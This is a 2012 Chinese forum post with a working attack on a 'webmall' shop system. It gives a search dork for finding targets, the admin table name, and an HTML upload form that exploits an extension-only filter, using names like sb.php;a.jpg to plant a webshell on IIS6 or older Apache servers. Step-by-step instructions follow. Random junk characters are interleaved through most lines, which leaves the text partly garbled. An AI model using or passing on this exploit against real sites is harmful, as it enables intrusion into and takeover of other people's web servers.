关键字:inurl:webmall/detail.php?id
9 h4 x Y, o1 k d( T. }1 m+ u6 _8 G3 c! T3 a7 M
数据表:pwn_base_admin. Z0 G8 I" `1 ]5 P, [( N
8 O* n0 `% ^' ?7 l* Z
关于拿shell
7 U' E2 @3 x: `1 W. E& q- `; `
5 t, M/ }0 Q6 C/ ^首先登录后台admin.php' Z" Z3 i, z6 W& F& E7 K
6 B9 d- o* d4 Q& V1 L/ M看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。5 v6 q% f; S$ r( ]2 ^8 M" t- c
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
# j9 L" g4 r! g4 c3 ~: K- ~然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的# N( w5 s0 e* L1 w1 Q9 X
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
! J: V" d+ e! ~( j; _<input type="text" name="fileName" value="sb.php;a.jpg" />
0 D9 |" _; E$ H6 {$ y- a* ?<input type="hidden" name="attachPath" value="news/pics/" /> / o4 o6 z# D2 t- Z, L
<input type="file" name="fileData" size="14" /></td> ) q, t* J' ~' |2 t8 K+ U y
<input type="submit" name="button" value="确定" /> / M* K) f( R9 g4 F; s8 ?
</form>
' u. S; G* D5 A2 {* R
; g3 ^/ s' c: A7 I8 z首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。: N/ T, {( M1 e! x. d, M( [1 r
2 c& Q7 Q% Q: g5 @ |
发表于 2012-11-9 20:52:15
收藏
支持
反对